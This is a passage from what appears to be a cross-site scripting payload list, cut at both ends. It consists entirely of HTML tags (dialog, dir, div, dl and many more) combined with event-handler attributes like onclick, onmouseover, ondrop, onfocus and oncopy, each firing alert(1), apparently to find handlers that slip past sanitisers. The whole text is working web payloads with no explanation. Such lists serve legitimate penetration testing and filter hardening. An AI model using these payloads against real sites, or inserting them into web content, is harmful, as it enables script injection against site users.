oncut="alert(1)" contenteditable>test</dialog> <dialog ondblclick="alert(1)">test</dialog> <dialog onfocusout=alert(1) tabindex=1 id=x></dialog><input autofocus> <dialog onkeydown="alert(1)" contenteditable>test</dialog> <dialog onkeypress="alert(1)" contenteditable>test</dialog> <dialog onkeyup="alert(1)" contenteditable>test</dialog> <dialog onmousedown="alert(1)">test</dialog> <dialog onmouseenter="alert(1)">test</dialog> <dialog onmouseleave="alert(1)">test</dialog> <dialog onmousemove="alert(1)">test</dialog> <dialog onmouseout="alert(1)">test</dialog> <dialog onmouseover="alert(1)">test</dialog> <dialog onmouseup="alert(1)">test</dialog> <dialog onpaste="alert(1)" contenteditable>test</dialog> <dir draggable="true" ondrag="alert(1)">test</dir> <dir draggable="true" ondragend="alert(1)">test</dir> <dir draggable="true" ondragenter="alert(1)">test</dir> <dir draggable="true" ondragleave="alert(1)">test</dir> <dir draggable="true" ondragstart="alert(1)">test</dir> <dir id=x tabindex=1 onactivate=alert(1)></dir> <dir id=x tabindex=1 onbeforeactivate=alert(1)></dir> <dir id=x tabindex=1 onbeforedeactivate=alert(1)></dir><input autofocus> <dir id=x tabindex=1 ondeactivate=alert(1)></dir><input id=y autofocus> <dir id=x tabindex=1 onfocus=alert(1)></dir> <dir id=x tabindex=1 onfocusin=alert(1)></dir> <dir onbeforecopy="alert(1)" contenteditable>test</dir> <dir onbeforecut="alert(1)" contenteditable>test</dir> <dir onbeforepaste="alert(1)" contenteditable>test</dir> <dir onblur=alert(1) tabindex=1 id=x></dir><input autofocus> <dir onclick="alert(1)">test</dir> <dir oncontextmenu="alert(1)">test</dir> <dir oncopy="alert(1)" contenteditable>test</dir> <dir oncut="alert(1)" contenteditable>test</dir> <dir ondblclick="alert(1)">test</dir> <dir onfocusout=alert(1) tabindex=1 id=x></dir><input autofocus> <dir onkeydown="alert(1)" contenteditable>test</dir> <dir onkeypress="alert(1)" contenteditable>test</dir> <dir onkeyup="alert(1)" contenteditable>test</dir> <dir onmousedown="alert(1)">test</dir> <dir onmouseenter="alert(1)">test</dir> <dir onmouseleave="alert(1)">test</dir> <dir onmousemove="alert(1)">test</dir> <dir onmouseout="alert(1)">test</dir> <dir onmouseover="alert(1)">test</dir> <dir onmouseup="alert(1)">test</dir> <dir onpaste="alert(1)" contenteditable>test</dir> <div draggable="true" contenteditable>drag me</div><a ondragover=alert(1) contenteditable>drop here</a> <div draggable="true" contenteditable>drag me</div><a ondrop=alert(1) contenteditable>drop here</a> <div draggable="true" contenteditable>drag me</div><abbr ondragover=alert(1) contenteditable>drop here</abbr> <div draggable="true" contenteditable>drag me</div><abbr ondrop=alert(1) contenteditable>drop here</abbr> <div draggable="true" contenteditable>drag me</div><acronym ondragover=alert(1) contenteditable>drop here</acronym> <div draggable="true" contenteditable>drag me</div><acronym ondrop=alert(1) contenteditable>drop here</acronym> <div draggable="true" contenteditable>drag me</div><address ondragover=alert(1) contenteditable>drop here</address> <div draggable="true" contenteditable>drag me</div><address ondrop=alert(1) contenteditable>drop here</address> <div draggable="true" contenteditable>drag me</div><applet ondragover=alert(1) contenteditable>drop here</applet> <div draggable="true" contenteditable>drag me</div><applet ondrop=alert(1) contenteditable>drop here</applet> <div draggable="true" contenteditable>drag me</div><area ondragover=alert(1) contenteditable>drop here</area> <div draggable="true" contenteditable>drag me</div><area ondrop=alert(1) contenteditable>drop here</area> <div draggable="true" contenteditable>drag me</div><article ondragover=alert(1) contenteditable>drop here</article> <div draggable="true" contenteditable>drag me</div><article ondrop=alert(1) contenteditable>drop here</article> <div draggable="true" contenteditable>drag me</div><aside ondragover=alert(1) contenteditable>drop here</aside> <div draggable="true" contenteditable>drag me</div><aside ondrop=alert(1) contenteditable>drop here</aside> <div draggable="true" contenteditable>drag me</div><audio ondragover=alert(1) contenteditable>drop here</audio> <div draggable="true" contenteditable>drag me</div><audio ondrop=alert(1) contenteditable>drop here</audio> <div draggable="true" contenteditable>drag me</div><b ondragover=alert(1) contenteditable>drop here</b> <div draggable="true" contenteditable>drag me</div><b ondrop=alert(1) contenteditable>drop here</b> <div draggable="true" contenteditable>drag me</div><base ondragover=alert(1) contenteditable>drop here</base> <div draggable="true" contenteditable>drag me</div><base ondrop=alert(1) contenteditable>drop here</base> <div draggable="true" contenteditable>drag me</div><basefont ondragover=alert(1) contenteditable>drop here</basefont> <div draggable="true" contenteditable>drag me</div><basefont ondrop=alert(1) contenteditable>drop here</basefont> <div draggable="true" contenteditable>drag me</div><bdi ondragover=alert(1) contenteditable>drop here</bdi> <div draggable="true" contenteditable>drag me</div><bdi ondrop=alert(1) contenteditable>drop here</bdi> <div draggable="true" contenteditable>drag me</div><bdo ondragover=alert(1) contenteditable>drop here</bdo> <div draggable="true" contenteditable>drag me</div><bdo ondrop=alert(1) contenteditable>drop here</bdo> <div draggable="true" contenteditable>drag me</div><bgsound ondragover=alert(1) contenteditable>drop here</bgsound> <div draggable="true" contenteditable>drag me</div><bgsound ondrop=alert(1) contenteditable>drop here</bgsound> <div draggable="true" contenteditable>drag me</div><big ondragover=alert(1) contenteditable>drop here</big> <div draggable="true" contenteditable>drag me</div><big ondrop=alert(1) contenteditable>drop here</big> <div draggable="true" contenteditable>drag me</div><blink ondragover=alert(1) contenteditable>drop here</blink> <div draggable="true" contenteditable>drag me</div><blink ondrop=alert(1) contenteditable>drop here</blink> <div draggable="true" contenteditable>drag me</div><blockquote ondragover=alert(1) contenteditable>drop here</blockquote> <div draggable="true" contenteditable>drag me</div><blockquote ondrop=alert(1) contenteditable>drop here</blockquote> <div draggable="true" contenteditable>drag me</div><body ondragover=alert(1) contenteditable>drop here</body> <div draggable="true" contenteditable>drag me</div><body ondrop=alert(1) contenteditable>drop here</body> <div draggable="true" contenteditable>drag me</div><br ondragover=alert(1) contenteditable>drop here</br> <div draggable="true" contenteditable>drag me</div><br ondrop=alert(1) contenteditable>drop here</br> <div draggable="true" contenteditable>drag me</div><button ondragover=alert(1) contenteditable>drop here</button> <div draggable="true" contenteditable>drag me</div><button ondrop=alert(1) contenteditable>drop here</button> <div draggable="true" contenteditable>drag me</div><canvas ondragover=alert(1) contenteditable>drop here</canvas> <div draggable="true" contenteditable>drag me</div><canvas ondrop=alert(1) contenteditable>drop here</canvas> <div draggable="true" contenteditable>drag me</div><caption ondragover=alert(1) contenteditable>drop here</caption> <div draggable="true" contenteditable>drag me</div><caption ondrop=alert(1) contenteditable>drop here</caption> <div draggable="true" contenteditable>drag me</div><center ondragover=alert(1) contenteditable>drop here</center> <div draggable="true" contenteditable>drag me</div><center ondrop=alert(1) contenteditable>drop here</center> <div draggable="true" contenteditable>drag me</div><cite ondragover=alert(1) contenteditable>drop here</cite> <div draggable="true" contenteditable>drag me</div><cite ondrop=alert(1) contenteditable>drop here</cite> <div draggable="true" contenteditable>drag me</div><code ondragover=alert(1) contenteditable>drop here</code> <div draggable="true" contenteditable>drag me</div><code ondrop=alert(1) contenteditable>drop here</code> <div draggable="true" contenteditable>drag me</div><col ondragover=alert(1) contenteditable>drop here</col> <div draggable="true" contenteditable>drag me</div><col ondrop=alert(1) contenteditable>drop here</col> <div draggable="true" contenteditable>drag me</div><colgroup ondragover=alert(1) contenteditable>drop here</colgroup> <div draggable="true" contenteditable>drag me</div><colgroup ondrop=alert(1) contenteditable>drop here</colgroup> <div draggable="true" contenteditable>drag me</div><command ondragover=alert(1) contenteditable>drop here</command> <div draggable="true" contenteditable>drag me</div><command ondrop=alert(1) contenteditable>drop here</command> <div draggable="true" contenteditable>drag me</div><content ondragover=alert(1) contenteditable>drop here</content> <div draggable="true" contenteditable>drag me</div><content ondrop=alert(1) contenteditable>drop here</content> <div draggable="true" contenteditable>drag me</div><data ondragover=alert(1) contenteditable>drop here</data> <div draggable="true" contenteditable>drag me</div><data ondrop=alert(1) contenteditable>drop here</data> <div draggable="true" contenteditable>drag me</div><datalist ondragover=alert(1) contenteditable>drop here</datalist> <div draggable="true" contenteditable>drag me</div><datalist ondrop=alert(1) contenteditable>drop here</datalist> <div draggable="true" contenteditable>drag me</div><dd ondragover=alert(1) contenteditable>drop here</dd> <div draggable="true" contenteditable>drag me</div><dd ondrop=alert(1) contenteditable>drop here</dd> <div draggable="true" contenteditable>drag me</div><del ondragover=alert(1) contenteditable>drop here</del> <div draggable="true" contenteditable>drag me</div><del ondrop=alert(1) contenteditable>drop here</del> <div draggable="true" contenteditable>drag me</div><details ondragover=alert(1) contenteditable>drop here</details> <div draggable="true" contenteditable>drag me</div><details ondrop=alert(1) contenteditable>drop here</details> <div draggable="true" contenteditable>drag me</div><dfn ondragover=alert(1) contenteditable>drop here</dfn> <div draggable="true" contenteditable>drag me</div><dfn ondrop=alert(1) contenteditable>drop here</dfn> <div draggable="true" contenteditable>drag me</div><dialog ondragover=alert(1) contenteditable>drop here</dialog> <div draggable="true" contenteditable>drag me</div><dialog ondrop=alert(1) contenteditable>drop here</dialog> <div draggable="true" contenteditable>drag me</div><dir ondragover=alert(1) contenteditable>drop here</dir> <div draggable="true" contenteditable>drag me</div><dir ondrop=alert(1) contenteditable>drop here</dir> <div draggable="true" contenteditable>drag me</div><div ondragover=alert(1) contenteditable>drop here</div> <div draggable="true" contenteditable>drag me</div><div ondrop=alert(1) contenteditable>drop here</div> <div draggable="true" contenteditable>drag me</div><dl ondragover=alert(1) contenteditable>drop here</dl> <div draggable="true" contenteditable>drag me</div><dl ondrop=alert(1) contenteditable>drop here</dl> <div draggable="true" contenteditable>drag me</div><dt ondragover=alert(1) contenteditable>drop here</dt> <div draggable="true" contenteditable>drag me</div><dt ondrop=alert(1) contenteditable>drop here</dt> <div draggable="true" contenteditable>drag me</div><element ondragover=alert(1) contenteditable>drop here</element> <div draggable="true" contenteditable>drag me</div><element ondrop=alert(1) contenteditable>drop here</element> <div draggable="true" contenteditable>drag me</div><em ondragover=alert(1) contenteditable>drop here</em> <div draggable="true" contenteditable>drag me</div><em ondrop=alert(1) contenteditable>drop here</em> <div draggable="true" contenteditable>drag me</div><embed ondragover=alert(1) contenteditable>drop here</embed> <div draggable="true" contenteditable>drag me</div><embed ondrop=alert(1) contenteditable>drop here</embed> <div draggable="true" contenteditable>drag me</div><fieldset ondragover=alert(1) contenteditable>drop here</fieldset> <div draggable="true" contenteditable>drag me</div><fieldset ondrop=alert(1) contenteditable>drop here</fieldset> <div draggable="true" contenteditable>drag me</div><figcaption ondragover=alert(1) contenteditable>drop here</figcaption> <div draggable="true" contenteditable>drag me</div><figcaption ondrop=alert(1) contenteditable>drop here</figcaption> <div draggable="true" contenteditable>drag me</div><figure ondragover=alert(1) contenteditable>drop here</figure> <div draggable="true" contenteditable>drag me</div><figure ondrop=alert(1) contenteditable>drop here</figure> <div draggable="true" contenteditable>drag me</div><font ondragover=alert(1) contenteditable>drop here</font> <div draggable="true" contenteditable>drag me</div><font ondrop=alert(1) contenteditable>drop here</font> <div draggable="true" contenteditable>drag me</div><footer ondragover=alert(1) contenteditable>drop here</footer> <div draggable="true" contenteditable>drag me</div><footer ondrop=alert(1) contenteditable>drop here</footer> <div draggable="true" contenteditable>drag me</div><form ondragover=alert(1) contenteditable>drop here</form> <div draggable="true" contenteditable>drag me</div><form ondrop=alert(1) contenteditable>drop here</form> <div draggable="true" contenteditable>drag me</div><frame ondragover=alert(1) contenteditable>drop here</frame> <div draggable="true" contenteditable>drag me</div><frame ondrop=alert(1) contenteditable>drop here</frame> <div draggable="true" contenteditable>drag me</div><frameset ondragover=alert(1) contenteditable>drop here</frameset> <div draggable="true" contenteditable>drag me</div><frameset ondrop=alert(1) contenteditable>drop here</frameset> <div draggable="true" contenteditable>drag me</div><h1 ondragover=alert(1) contenteditable>drop here</h1> <div draggable="true" contenteditable>drag me</div><h1 ondrop=alert(1) contenteditable>drop here</h1> <div draggable="true" contenteditable>drag me</div><head ondragover=alert(1) contenteditable>drop here</head> <div draggable="true" contenteditable>drag me</div><head ondrop=alert(1) contenteditable>drop here</head> <div draggable="true" contenteditable>drag me</div><header ondragover=alert(1) contenteditable>drop here</header> <div draggable="true" contenteditable>drag me</div><header ondrop=alert(1) contenteditable>drop here</header> <div draggable="true" contenteditable>drag me</div><hgroup ondragover=alert(1) contenteditable>drop here</hgroup> <div draggable="true" contenteditable>drag me</div><hgroup ondrop=alert(1) contenteditable>drop here</hgroup> <div draggable="true" contenteditable>drag me</div><hr ondragover=alert(1) contenteditable>drop here</hr> <div draggable="true" contenteditable>drag me</div><hr ondrop=alert(1) contenteditable>drop here</hr> <div draggable="true" contenteditable>drag me</div><html ondragover=alert(1) contenteditable>drop here</html> <div draggable="true" contenteditable>drag me</div><html ondrop=alert(1) contenteditable>drop here</html> <div draggable="true" contenteditable>drag me</div><i ondragover=alert(1) contenteditable>drop here</i> <div draggable="true" contenteditable>drag me</div><i ondrop=alert(1) contenteditable>drop here</i> <div draggable="true" contenteditable>drag me</div><iframe ondragover=alert(1) contenteditable>drop here</iframe> <div draggable="true" contenteditable>drag me</div><iframe ondrop=alert(1) contenteditable>drop here</iframe> <div draggable="true" contenteditable>drag me</div><image ondragover=alert(1) contenteditable>drop here</image> <div draggable="true" contenteditable>drag me</div><image ondrop=alert(1) contenteditable>drop here</image> <div draggable="true" contenteditable>drag me</div><img ondragover=alert(1) contenteditable>drop here</img> <div draggable="true" contenteditable>drag me</div><img ondrop=alert(1) contenteditable>drop here</img> <div draggable="true" contenteditable>drag me</div><input ondragover=alert(1) contenteditable>drop here</input> <div draggable="true" contenteditable>drag me</div><input ondrop=alert(1) contenteditable>drop here</input> <div draggable="true" contenteditable>drag me</div><ins ondragover=alert(1) contenteditable>drop here</ins> <div draggable="true" contenteditable>drag me</div><ins ondrop=alert(1) contenteditable>drop here</ins> <div draggable="true" contenteditable>drag me</div><isindex ondragover=alert(1) contenteditable>drop here</isindex> <div draggable="true" contenteditable>drag me</div><isindex ondrop=alert(1) contenteditable>drop here</isindex> <div draggable="true" contenteditable>drag me</div><kbd ondragover=alert(1) contenteditable>drop here</kbd> <div draggable="true" contenteditable>drag me</div><kbd ondrop=alert(1) contenteditable>drop here</kbd> <div draggable="true" contenteditable>drag me</div><keygen ondragover=alert(1) contenteditable>drop here</keygen> <div draggable="true" contenteditable>drag me</div><keygen ondrop=alert(1) contenteditable>drop here</keygen> <div draggable="true" contenteditable>drag me</div><label ondragover=alert(1) contenteditable>drop here</label> <div draggable="true" contenteditable>drag me</div><label ondrop=alert(1) contenteditable>drop here</label> <div draggable="true" contenteditable>drag me</div><legend ondragover=alert(1) contenteditable>drop here</legend> <div draggable="true" contenteditable>drag me</div><legend ondrop=alert(1) contenteditable>drop here</legend> <div draggable="true" contenteditable>drag me</div><li ondragover=alert(1) contenteditable>drop here</li> <div draggable="true" contenteditable>drag me</div><li ondrop=alert(1) contenteditable>drop here</li> <div draggable="true" contenteditable>drag me</div><link ondragover=alert(1) contenteditable>drop here</link> <div draggable="true" contenteditable>drag me</div><link ondrop=alert(1) contenteditable>drop here</link> <div draggable="true" contenteditable>drag me</div><listing ondragover=alert(1) contenteditable>drop here</listing> <div draggable="true" contenteditable>drag me</div><listing ondrop=alert(1) contenteditable>drop here</listing> <div draggable="true" contenteditable>drag me</div><main ondragover=alert(1) contenteditable>drop here</main> <div draggable="true" contenteditable>drag me</div><main ondrop=alert(1) contenteditable>drop here</main> <div draggable="true" contenteditable>drag me</div><map ondragover=alert(1) contenteditable>drop here</map> <div draggable="true" contenteditable>drag me</div><map ondrop=alert(1) contenteditable>drop here</map> <div draggable="true" contenteditable>drag me</div><mark ondragover=alert(1) contenteditable>drop here</mark> <div draggable="true" contenteditable>drag me</div><mark ondrop=alert(1) contenteditable>drop here</mark> <div draggable="true" contenteditable>drag me</div><marquee ondragover=alert(1) contenteditable>drop here</marquee> <div draggable="true" contenteditable>drag me</div><marquee ondrop=alert(1) contenteditable>drop here</marquee> <div draggable="true" contenteditable>drag me</div><menu ondragover=alert(1) contenteditable>drop here</menu> <div draggable="true" contenteditable>drag me</div><menu ondrop=alert(1) contenteditable>drop here</menu> <div draggable="true" contenteditable>drag me</div><menuitem ondragover=alert(1) contenteditable>drop here</menuitem> <div draggable="true" contenteditable>drag me</div><menuitem ondrop=alert(1) contenteditable>drop here</menuitem> <div draggable="true" contenteditable>drag me</div><meta ondragover=alert(1) contenteditable>drop here</meta> <div draggable="true" contenteditable>drag me</div><meta ondrop=alert(1) contenteditable>drop here</meta> <div draggable="true" contenteditable>drag me</div><meter ondragover=alert(1) contenteditable>drop here</meter> <div draggable="true" contenteditable>drag me</div><meter ondrop=alert(1) contenteditable>drop here</meter> <div draggable="true" contenteditable>drag me</div><multicol ondragover=alert(1) contenteditable>drop here</multicol> <div draggable="true" contenteditable>drag me</div><multicol ondrop=alert(1) contenteditable>drop here</multicol> <div draggable="true" contenteditable>drag me</div><nav ondragover=alert(1) contenteditable>drop here</nav> <div draggable="true" contenteditable>drag me</div><nav ondrop=alert(1) contenteditable>drop here</nav> <div draggable="true" contenteditable>drag me</div><nextid ondragover=alert(1) contenteditable>drop here</nextid> <div draggable="true" contenteditable>drag me</div><nextid ondrop=alert(1) contenteditable>drop here</nextid> <div draggable="true" contenteditable>drag me</div><nobr ondragover=alert(1) contenteditable>drop here</nobr> <div draggable="true" contenteditable>drag me</div><nobr ondrop=alert(1) contenteditable>drop here</nobr> <div draggable="true" contenteditable>drag me</div><noembed ondragover=alert(1) contenteditable>drop here</noembed> <div draggable="true" contenteditable>drag me</div><noembed ondrop=alert(1) contenteditable>drop here</noembed> <div draggable="true" contenteditable>drag me</div><noframes ondragover=alert(1) contenteditable>drop here</noframes> <div draggable="true" contenteditable>drag me</div><noframes ondrop=alert(1) contenteditable>drop here</noframes> <div draggable="true" contenteditable>drag me</div><noscript ondragover=alert(1) contenteditable>drop here</noscript> <div draggable="true" contenteditable>drag me</div><noscript ondrop=alert(1) contenteditable>drop here</noscript> <div draggable="true" contenteditable>drag me</div><object ondragover=alert(1) contenteditable>drop here</object> <div draggable="true" contenteditable>drag me</div><object ondrop=alert(1) contenteditable>drop here</object> <div draggable="true" contenteditable>drag me</div><ol ondragover=alert(1) contenteditable>drop here</ol> <div draggable="true" contenteditable>drag me</div><ol ondrop=alert(1) contenteditable>drop here</ol> <div draggable="true" contenteditable>drag me</div><optgroup ondragover=alert(1) contenteditable>drop here</optgroup> <div draggable="true" contenteditable>drag me</div><optgroup ondrop=alert(1) contenteditable>drop here</optgroup> <div draggable="true" contenteditable>drag me</div><option ondragover=alert(1) contenteditable>drop here</option> <div draggable="true" contenteditable>drag me</div><option ondrop=alert(1) contenteditable>drop here</option> <div draggable="true" contenteditable>drag me</div><output ondragover=alert(1) contenteditable>drop here</output> <div draggable="true" contenteditable>drag me</div><output ondrop=alert(1) contenteditable>drop here</output> <div draggable="true" contenteditable>drag me</div><p ondragover=alert(1) contenteditable>drop here</p> <div draggable="true" contenteditable>drag me</div><p ondrop=alert(1) contenteditable>drop here</p> <div draggable="true" contenteditable>drag me</div><param ondragover=alert(1) contenteditable>drop here</param> <div draggable="true" contenteditable>drag me</div><param ondrop=alert(1) contenteditable>drop here</param> <div draggable="true" contenteditable>drag me</div><picture ondragover=alert(1) contenteditable>drop here</picture> <div draggable="true" contenteditable>drag me</div><picture ondrop=alert(1) contenteditable>drop here</picture> <div draggable="true" contenteditable>drag me</div><plaintext ondragover=alert(1) contenteditable>drop here</plaintext> <div draggable="true" contenteditable>drag me</div><plaintext ondrop=alert(1) contenteditable>drop here</plaintext> <div draggable="true" contenteditable>drag me</div><pre ondragover=alert(1) contenteditable>drop here</pre> <div draggable="true" contenteditable>drag me</div><pre ondrop=alert(1) contenteditable>drop here</pre> <div draggable="true" contenteditable>drag me</div><progress ondragover=alert(1) contenteditable>drop here</progress> <div draggable="true" contenteditable>drag me</div><progress ondrop=alert(1) contenteditable>drop here</progress> <div draggable="true" contenteditable>drag me</div><q ondragover=alert(1) contenteditable>drop here</q> <div draggable="true" contenteditable>drag me</div><q ondrop=alert(1) contenteditable>drop here</q> <div draggable="true" contenteditable>drag me</div><rb ondragover=alert(1) contenteditable>drop here</rb> <div draggable="true" contenteditable>drag me</div><rb ondrop=alert(1) contenteditable>drop here</rb> <div draggable="true" contenteditable>drag me</div><rp ondragover=alert(1) contenteditable>drop here</rp> <div draggable="true" contenteditable>drag me</div><rp ondrop=alert(1) contenteditable>drop here</rp> <div draggable="true" contenteditable>drag me</div><rt ondragover=alert(1) contenteditable>drop here</rt> <div draggable="true" contenteditable>drag me</div><rt ondrop=alert(1) contenteditable>drop here</rt> <div draggable="true" contenteditable>drag me</div><rtc ondragover=alert(1) contenteditable>drop here</rtc> <div draggable="true" contenteditable>drag me</div><rtc ondrop=alert(1) contenteditable>drop here</rtc> <div draggable="true" contenteditable>drag me</div><ruby ondragover=alert(1) contenteditable>drop here</ruby> <div draggable="true" contenteditable>drag me</div><ruby ondrop=alert(1) contenteditable>drop here</ruby> <div draggable="true" contenteditable>drag me</div><s ondragover=alert(1) contenteditable>drop here</s> <div draggable="true" contenteditable>drag me</div><s ondrop=alert(1) contenteditable>drop here</s> <div draggable="true" contenteditable>drag me</div><samp ondragover=alert(1) contenteditable>drop here</samp> <div draggable="true" contenteditable>drag me</div><samp ondrop=alert(1) contenteditable>drop here</samp> <div draggable="true" contenteditable>drag me</div><script ondragover=alert(1) contenteditable>drop here</script> <div draggable="true" contenteditable>drag me</div><script ondrop=alert(1) contenteditable>drop here</script> <div draggable="true" contenteditable>drag me</div><section ondragover=alert(1) contenteditable>drop here</section> <div draggable="true" contenteditable>drag me</div><section ondrop=alert(1) contenteditable>drop here</section> <div draggable="true" contenteditable>drag me</div><select ondragover=alert(1) contenteditable>drop here</select> <div draggable="true" contenteditable>drag me</div><select ondrop=alert(1) contenteditable>drop here</select> <div draggable="true" contenteditable>drag me</div><shadow ondragover=alert(1) contenteditable>drop here</shadow> <div draggable="true" contenteditable>drag me</div><shadow ondrop=alert(1) contenteditable>drop here</shadow> <div draggable="true" contenteditable>drag me</div><slot ondragover=alert(1) contenteditable>drop here</slot> <div draggable="true" contenteditable>drag me</div><slot ondrop=alert(1) contenteditable>drop here</slot> <div draggable="true" contenteditable>drag me</div><small ondragover=alert(1) contenteditable>drop here</small> <div draggable="true" contenteditable>drag me</div><small ondrop=alert(1) contenteditable>drop here</small> <div draggable="true" contenteditable>drag me</div><source ondragover=alert(1) contenteditable>drop here</source> <div draggable="true" contenteditable>drag me</div><source ondrop=alert(1) contenteditable>drop here</source> <div draggable="true" contenteditable>drag me</div><spacer ondragover=alert(1) contenteditable>drop here</spacer> <div draggable="true" contenteditable>drag me</div><spacer ondrop=alert(1) contenteditable>drop here</spacer> <div draggable="true" contenteditable>drag me</div><span ondragover=alert(1) contenteditable>drop here</span> <div draggable="true" contenteditable>drag me</div><span ondrop=alert(1) contenteditable>drop here</span> <div draggable="true" contenteditable>drag me</div><strike ondragover=alert(1) contenteditable>drop here</strike> <div draggable="true" contenteditable>drag me</div><strike ondrop=alert(1) contenteditable>drop here</strike> <div draggable="true" contenteditable>drag me</div><strong ondragover=alert(1) contenteditable>drop here</strong> <div draggable="true" contenteditable>drag me</div><strong ondrop=alert(1) contenteditable>drop here</strong> <div draggable="true" contenteditable>drag me</div><style ondragover=alert(1) contenteditable>drop here</style> <div draggable="true" contenteditable>drag me</div><style ondrop=alert(1) contenteditable>drop here</style> <div draggable="true" contenteditable>drag me</div><sub ondragover=alert(1) contenteditable>drop here</sub> <div draggable="true" contenteditable>drag me</div><sub ondrop=alert(1) contenteditable>drop here</sub> <div draggable="true" contenteditable>drag me</div><summary ondragover=alert(1) contenteditable>drop here</summary> <div draggable="true" contenteditable>drag me</div><summary ondrop=alert(1) contenteditable>drop here</summary> <div draggable="true" contenteditable>drag me</div><sup ondragover=alert(1) contenteditable>drop here</sup> <div draggable="true" contenteditable>drag me</div><sup ondrop=alert(1) contenteditable>drop here</sup> <div draggable="true" contenteditable>drag me</div><svg ondragover=alert(1) contenteditable>drop here</svg> <div draggable="true" contenteditable>drag me</div><svg ondrop=alert(1) contenteditable>drop here</svg> <div draggable="true" contenteditable>drag me</div><table ondragover=alert(1) contenteditable>drop here</table> <div draggable="true" contenteditable>drag me</div><table ondrop=alert(1) contenteditable>drop here</table> <div draggable="true" contenteditable>drag me</div><tbody ondragover=alert(1) contenteditable>drop here</tbody> <div draggable="true" contenteditable>drag me</div><tbody ondrop=alert(1) contenteditable>drop here</tbody> <div draggable="true" contenteditable>drag me</div><td ondragover=alert(1) contenteditable>drop here</td> <div draggable="true" contenteditable>drag me</div><td ondrop=alert(1) contenteditable>drop here</td> <div draggable="true" contenteditable>drag me</div><template ondragover=alert(1) contenteditable>drop here</template> <div draggable="true" contenteditable>drag me</div><template ondrop=alert(1) contenteditable>drop here</template> <div draggable="true" contenteditable>drag me</div><textarea ondragover=alert(1) contenteditable>drop here</textarea> <div draggable="true" contenteditable>drag me</div><textarea ondrop=alert(1) contenteditable>drop here</textarea> <div draggable="true" contenteditable>drag me</div><tfoot ondragover=alert(1) contenteditable>drop here</tfoot> <div draggable="true" contenteditable>drag me</div><tfoot ondrop=alert(1) contenteditable>drop here</tfoot> <div draggable="true" contenteditable>drag me</div><th ondragover=alert(1) contenteditable>drop here</th> <div draggable="true" contenteditable>drag me</div><th ondrop=alert(1) contenteditable>drop here</th> <div draggable="true" contenteditable>drag me</div><thead ondragover=alert(1) contenteditable>drop here</thead> <div draggable="true" contenteditable>drag me</div><thead ondrop=alert(1) contenteditable>drop here</thead> <div draggable="true" contenteditable>drag me</div><time ondragover=alert(1) contenteditable>drop here</time> <div draggable="true" contenteditable>drag me</div><time ondrop=alert(1) contenteditable>drop here</time> <div draggable="true" contenteditable>drag me</div><title ondragover=alert(1) contenteditable>drop here</title> <div draggable="true" contenteditable>drag me</div><title ondrop=alert(1) contenteditable>drop here</title> <div draggable="true" contenteditable>drag me</div><tr ondragover=alert(1) contenteditable>drop here</tr> <div draggable="true" contenteditable>drag me</div><tr ondrop=alert(1) contenteditable>drop here</tr> <div draggable="true" contenteditable>drag me</div><track ondragover=alert(1) contenteditable>drop here</track> <div draggable="true" contenteditable>drag me</div><track ondrop=alert(1) contenteditable>drop here</track> <div draggable="true" contenteditable>drag me</div><tt ondragover=alert(1) contenteditable>drop here</tt> <div draggable="true" contenteditable>drag me</div><tt ondrop=alert(1) contenteditable>drop here</tt> <div draggable="true" contenteditable>drag me</div><u ondragover=alert(1) contenteditable>drop here</u> <div draggable="true" contenteditable>drag me</div><u ondrop=alert(1) contenteditable>drop here</u> <div draggable="true" contenteditable>drag me</div><ul ondragover=alert(1) contenteditable>drop here</ul> <div draggable="true" contenteditable>drag me</div><ul ondrop=alert(1) contenteditable>drop here</ul> <div draggable="true" contenteditable>drag me</div><var ondragover=alert(1) contenteditable>drop here</var> <div draggable="true" contenteditable>drag me</div><var ondrop=alert(1) contenteditable>drop here</var> <div draggable="true" contenteditable>drag me</div><video ondragover=alert(1) contenteditable>drop here</video> <div draggable="true" contenteditable>drag me</div><video ondrop=alert(1) contenteditable>drop here</video> <div draggable="true" contenteditable>drag me</div><wbr ondragover=alert(1) contenteditable>drop here</wbr> <div draggable="true" contenteditable>drag me</div><wbr ondrop=alert(1) contenteditable>drop here</wbr> <div draggable="true" contenteditable>drag me</div><xmp ondragover=alert(1) contenteditable>drop here</xmp> <div draggable="true" contenteditable>drag me</div><xmp ondrop=alert(1) contenteditable>drop here</xmp> <div draggable="true" ondrag="alert(1)">test</div> <div draggable="true" ondragend="alert(1)">test</div> <div draggable="true" ondragenter="alert(1)">test</div> <div draggable="true" ondragleave="alert(1)">test</div> <div draggable="true" ondragstart="alert(1)">test</div> <div id=x tabindex=1 onactivate=alert(1)></div> <div id=x tabindex=1 onbeforeactivate=alert(1)></div> <div id=x tabindex=1 onbeforedeactivate=alert(1)></div><input autofocus> <div id=x tabindex=1 ondeactivate=alert(1)></div><input id=y autofocus> <div id=x tabindex=1 onfocus=alert(1)></div> <div id=x tabindex=1 onfocusin=alert(1)></div> <div onbeforecopy="alert(1)" contenteditable>test</div> <div onbeforecut="alert(1)" contenteditable>test</div> <div onbeforepaste="alert(1)" contenteditable>test</div> <div onblur=alert(1) tabindex=1 id=x></div><input autofocus> <div onclick="alert(1)">test</div> <div oncontextmenu="alert(1)">test</div> <div oncopy="alert(1)" contenteditable>test</div> <div oncut="alert(1)" contenteditable>test</div> <div ondblclick="alert(1)">test</div> <div onfocusout=alert(1) tabindex=1 id=x></div><input autofocus> <div onkeydown="alert(1)" contenteditable>test</div> <div onkeypress="alert(1)" contenteditable>test</div> <div onkeyup="alert(1)" contenteditable>test</div> <div onmousedown="alert(1)">test</div> <div onmouseenter="alert(1)">test</div> <div onmouseleave="alert(1)">test</div> <div onmousemove="alert(1)">test</div> <div onmouseout="alert(1)">test</div> <div onmouseover="alert(1)">test</div> <div onmouseup="alert(1)">test</div> <div onpaste="alert(1)" contenteditable>test</div> <dl draggable="true" ondrag="alert(1)">test</dl> <dl draggable="true" ondragend="alert(1)">test</dl> <dl draggable="true" ondragenter="alert(1)">test</dl> <dl draggable="true" ondragleave="alert(1)">test</dl> <dl draggable="true" ondragstart="alert(1)">test</dl> <dl id=x tabindex=1 onactivate=alert(1)></dl> <dl id=x tabindex=1 onbeforeactivate=alert(1)></dl> <dl id=x tabindex=1 onbeforedeactivate=alert(1)></dl><input autofocus> <dl id=x tabindex=1 ondeactivate=alert(1)></dl><input id=y autofocus> <dl id=x tabindex=1 onfocus=alert(1)></dl> <dl id=x tabindex=1 onfocusin=alert(1)></dl> <dl onbeforecopy="alert(1)" contenteditable>test</dl> <dl onbeforecut="alert(1)" contenteditable>test</dl> <dl onbeforepaste="alert(1)" contenteditable>test</dl> <dl onblur=alert(1) tabindex=1 